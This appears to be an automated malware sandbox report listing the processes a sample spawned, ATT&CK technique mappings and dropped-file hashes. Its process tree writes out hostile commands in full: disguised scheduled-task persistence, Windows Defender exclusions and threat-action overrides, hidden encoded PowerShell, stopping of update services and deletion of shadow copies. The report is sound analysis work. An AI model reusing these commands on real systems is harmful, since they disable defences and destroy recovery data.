  PID:6180
- - C:\Users\Admin\AppData\Local\Temp\wfwvuws.exe
    "C:\Users\Admin\AppData\Local\Temp\wfwvuws.exe" C:\Users\Admin\AppData\Local\Temp\wammagdq.lpz
    3⤵
    PID:6644
- C:\Users\Admin\AppData\Local\Temp\a\001.exe
  "C:\Users\Admin\AppData\Local\Temp\a\001.exe"
  2⤵
  PID:1824
- C:\Users\Admin\AppData\Local\Temp\a\tonyzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\tonyzx.exe"
  2⤵
  PID:228
- C:\Users\Admin\AppData\Local\Temp\a\ohoyec.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ohoyec.exe"
  2⤵
  PID:7892
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c ipconfig /release
    3⤵
    PID:3596
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
    3⤵
    PID:4332
- C:\Users\Admin\AppData\Local\Temp\a\zj.exe
  "C:\Users\Admin\AppData\Local\Temp\a\zj.exe"
  2⤵
  PID:3460

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:4340
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 053F22F858DDA91CAA07FBD06F683C99 C
  2⤵
  PID:4872
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 91CC343439B90BFDE060741A27FE1349 C
  2⤵
  PID:3284
- C:\Windows\system32\srtasks.exe
  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
  2⤵
  PID:3984

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3448

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:6064

C:\Windows\system32\certreq.exe
"C:\Windows\system32\certreq.exe"
1⤵
PID:4548

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lzkcwj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
1⤵
PID:6116

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#rjzfniou#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe" }
1⤵
PID:4464
- C:\Windows\system32\schtasks.exe
  "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
  2⤵
  PID:7812

C:\Users\Admin\AppData\Local\Temp\dSEqUCVOPUvmFZjdC\aohSQnOiRdvcplp\XNdRfCK.exe
C:\Users\Admin\AppData\Local\Temp\dSEqUCVOPUvmFZjdC\aohSQnOiRdvcplp\XNdRfCK.exe 5E /site_id 385104 /S
1⤵
PID:1144
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:4356
- - C:\Windows\SysWOW64\wermgr.exe
    "C:\Windows\system32\wermgr.exe" "-outproc" "0" "4356" "1752" "1700" "1756" "0" "0" "1760" "0" "0" "0" "0" "0"
    3⤵
    PID:7244
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BNyTRLFWpkwbC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BNyTRLFWpkwbC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JDdywVbgHqEU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JDdywVbgHqEU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KnniQPNKaQpppomCylR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KnniQPNKaQpppomCylR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RMSgaodHU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RMSgaodHU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kGOVMDjYHeUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kGOVMDjYHeUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\XrXLdSjsBkDyCEVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\XrXLdSjsBkDyCEVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\dSEqUCVOPUvmFZjdC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\dSEqUCVOPUvmFZjdC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\QZIGawXLVDAhKfqK\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\QZIGawXLVDAhKfqK\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  PID:5364
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BNyTRLFWpkwbC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2228
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BNyTRLFWpkwbC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1900
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JDdywVbgHqEU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4476
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JDdywVbgHqEU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4720
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KnniQPNKaQpppomCylR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1400
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KnniQPNKaQpppomCylR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6464
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RMSgaodHU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2816
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RMSgaodHU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5088
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kGOVMDjYHeUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3500

C:\Users\Admin\AppData\Local\Microsoft\Eg46LS4U.exe
"C:\Users\Admin\AppData\Local\Microsoft\Eg46LS4U.exe"
1⤵
PID:580
- C:\Users\Admin\AppData\Local\Microsoft\Eg46LS4U.exe
  C:\Users\Admin\AppData\Local\Microsoft\Eg46LS4U.exe
  2⤵
  PID:7756
- C:\Users\Admin\AppData\Local\Microsoft\Eg46LS4U.exe
  C:\Users\Admin\AppData\Local\Microsoft\Eg46LS4U.exe
  2⤵
  PID:7812

C:\Users\Admin\AppData\Local\Microsoft\)Gs-68R.exe
"C:\Users\Admin\AppData\Local\Microsoft\)Gs-68R.exe"
1⤵
PID:7788
- C:\Users\Admin\AppData\Local\Microsoft\)Gs-68R.exe
  C:\Users\Admin\AppData\Local\Microsoft\)Gs-68R.exe
  2⤵
  PID:4844
- C:\Users\Admin\AppData\Local\Microsoft\)Gs-68R.exe
  C:\Users\Admin\AppData\Local\Microsoft\)Gs-68R.exe
  2⤵
  PID:8172

C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\y6228869.exe
C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\y6228869.exe
1⤵
PID:7604
- C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\k0214245.exe
  C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\k0214245.exe
  2⤵
  PID:688
- C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\l1822850.exe
  C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\l1822850.exe
  2⤵
  PID:6864

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:7068

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:7652
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:7992
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:5240

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:7516

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:7064

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#bysta#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
1⤵
PID:7200
- C:\Windows\system32\wermgr.exe
  "C:\Windows\system32\wermgr.exe" "-outproc" "0" "7200" "1628" "1444" "1624" "0" "0" "1632" "0" "0" "0" "0" "0"
  2⤵
  PID:532

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:4284

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:5188

C:\Users\Admin\AppData\Roaming\bwucwfa
C:\Users\Admin\AppData\Roaming\bwucwfa
1⤵
PID:7316
- C:\Users\Admin\AppData\Roaming\bwucwfa
  C:\Users\Admin\AppData\Roaming\bwucwfa
  2⤵
  PID:2980

C:\ProgramData\Dllhost\dllhost.exe
C:\ProgramData\Dllhost\dllhost.exe
1⤵
PID:7204

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:6632

C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
1⤵
- Interacts with shadow copies
PID:6700

C:\Users\Admin\AppData\Local\Temp\dSEqUCVOPUvmFZjdC\agtKdVtYDabvpUy\tfdMsAb.exe
C:\Users\Admin\AppData\Local\Temp\dSEqUCVOPUvmFZjdC\agtKdVtYDabvpUy\tfdMsAb.exe Ur /site_id 385104 /S
1⤵
PID:6836
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bOkmhNOEEwkzVNcDkT"
  2⤵
  PID:4328
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
  2⤵
  PID:6628
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
    3⤵
    PID:5212
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
  2⤵
  PID:4092
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
    3⤵
    PID:7200
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\RMSgaodHU\bNqtgJ.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "kAQjyliGBRiPKMf" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:4888

C:\Windows\SysWOW64\wscript.exe
"C:\Windows\SysWOW64\wscript.exe"
1⤵
PID:8016
- C:\Windows\SysWOW64\cmd.exe
  /c del "C:\Users\Admin\AppData\Local\Temp\onzqy.exe"
  2⤵
  PID:2184

C:\Windows\system32\certreq.exe
"C:\Windows\system32\certreq.exe"
1⤵
PID:7576

C:\Windows\SysWOW64\autochk.exe
"C:\Windows\SysWOW64\autochk.exe"
1⤵
PID:7512

C:\Windows\SysWOW64\cscript.exe
"C:\Windows\SysWOW64\cscript.exe"
1⤵
PID:7692
- C:\Windows\SysWOW64\cmd.exe
  /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
  2⤵
  PID:7780

C:\Windows\SysWOW64\autoconv.exe
"C:\Windows\SysWOW64\autoconv.exe"
1⤵
PID:6696

C:\Windows\SysWOW64\svchost.exe
"C:\Windows\SysWOW64\svchost.exe"
1⤵
PID:2592

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
1⤵
PID:8100
- C:\Windows\SysWOW64\cmd.exe
  /c del "C:\Users\Admin\AppData\Local\Temp\a\kimzx.exe"
  2⤵
  PID:6428

C:\Windows\SysWOW64\autochk.exe
"C:\Windows\SysWOW64\autochk.exe"
1⤵
PID:6052

C:\Windows\SysWOW64\NETSTAT.EXE
"C:\Windows\SysWOW64\NETSTAT.EXE"
1⤵
- Gathers network information
PID:5960
- C:\Windows\SysWOW64\cmd.exe
  /c del "C:\Users\Admin\AppData\Local\Temp\a\nellyzx.exe"
  2⤵
  PID:216

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:7696

C:\Users\Admin\AppData\Roaming\explorer\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer\explorer.exe
1⤵
PID:7224

C:\Windows\SysWOW64\mstsc.exe
"C:\Windows\SysWOW64\mstsc.exe"
1⤵
PID:5868

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Scripting

T1064

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File Deletion

Impair Defenses

Modify Registry

Scripting

Web Service

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\SecureHorizons\SecureHorizons.exe

Filesize
69KB

MD5
20b9b58becaac1ef40afb3bbc50afaab

SHA1
8488e516dda61b37d835c1cff7605c8122f6d413

SHA256
19c03b4a9dad8c57202900d1680a1ad7498e1c56f85add84555f485e3505cfe8

SHA512
9c97ef5f1f095714e9743823aec6ecdf30141d06e2beb8e65eaa76bc7641355d68569fe79f8f84bdc7e18014295b6be1c2eaf069ecb53adf730a7d9d54a7549f

Download Submit
C:\ProgramData\02341676311427835639731145

Filesize
20KB

MD5
c9ff7748d8fcef4cf84a5501e996a641

SHA1
02867e5010f62f97ebb0cfb32cb3ede9449fe0c9

SHA256
4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988

SHA512
d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\nkpoliizx.exe.log

Filesize
1KB

MD5
0c2899d7c6746f42d5bbe088c777f94c

SHA1
622f66c5f7a3c91b28a9f43ce7c6cabadbf514f1

SHA256
5b0b99740cadaeff7b9891136644b396941547e20cc7eea646560d0dad5a5458

SHA512
ab7a3409ed4b6ca00358330a3aa4ef6de7d81eb21a5e24bb629ef6a7c7c4e2a70ca3accfbc989ed6e495fdb8eb6203a26d6f2a37b2a5809af4276af375b49078

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\oneetx.exe.log

Filesize
425B

MD5
605f809fab8c19729d39d075f7ffdb53

SHA1
c546f877c9bd53563174a90312a8337fdfc5fdd9

SHA256
6904d540649e76c55f99530b81be17e099184bb4cad415aa9b9b39cc3677f556

SHA512
82cc12c3186ae23884b8d5c104638c8206272c4389ade56b926dfc1d437b03888159b3c790b188b54d277a262e731927e703e680ea642e1417faee27443fd5b3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\FLQISSZ5\wpmm-featuresbox[1].css

Filesize
868B

MD5
33f7ac2d842254dc95ac9314ba196aaa

SHA1
682a8fb256e8f98ac7ff5912718ef9f014cbde5e

SHA256
c7243883df019158d584ad142b9b69ab0ff43312e939b1cd9b44b14c1a1d44f1

SHA512
6a2107df24c1156789193f5374ba65bd13393b98374d8439dad1b7092bfb5186aa883423e39298336d0b29207f00320d57e7ba6cd9a298914cd5f7c0ce499abf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\FLQISSZ5\wpmm-gridpost[1].css

Filesize
6KB

MD5
c1dbb330330b32850edd034213da2268

SHA1
ff7685af1e8ad0fc47acd4573671fd0a0061dab7

SHA256
5fef6314aa3fafeb4b0bc082cb5214b85d89edddb817095796d77875073c2f76

SHA512
ede4338659ecf8e6e134504b43ae90e7a4689e8fc2a904e77aec1fca09b495a876e87c838c1656c55409bd883f042108d76ee842c73a91e329be4cd8cc025d32

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\KIQVE9IA\613-2[3].htm

Filesize
234KB

MD5
0f8d04b3a16263227ad3e8622322db83

SHA1
0d60229ed0eb68ec071bf70cf8d677194fbaff12

SHA256
cedf96c88ac9a8243df095adb8c351b71b3c5ffa9a7c428cadb445ed9ef8010a

SHA512
b6b838f93011273919846d7e507b9a146bd0354d32e3491f6c530508a8f4aba314e1dd6d63f68b76ae9f5ca381f4eda875ac0bd1563bcd51f13ef2df7b1c01c0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\KIQVE9IA\advanced-ads-pro.min[1].js

Filesize
6KB

MD5
7bf80296ab6dff528ac224f6a8037456

SHA1
17ff1705dd463d80ee282c7f0f35979a9f199a53

SHA256
0ba2a0da5c4bbb91065d70e8d6e9e22b1eb1c2e066ac876e261efcc96036b031

SHA512
ea5aec6c0dcd33bc4a61c3be44d6133c16515b1da4ba507d36fd94b55199ce26c8eaf365a5dc479e8f6ca29b2e667642451b92d54e44476833ce915040d3f0c9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\KIQVE9IA\advanced-floating-content-public[2].js

Filesize
815B

MD5
899d9028e342511d3d2f3f9f32a02dd6

SHA1
b645ee4b97a7836efae7a95a732aa31fc56430e3

SHA256
0d17fc85d22eb1f6c056ea79c018062eda0f312350c68c836364dc082b9a06bc

SHA512
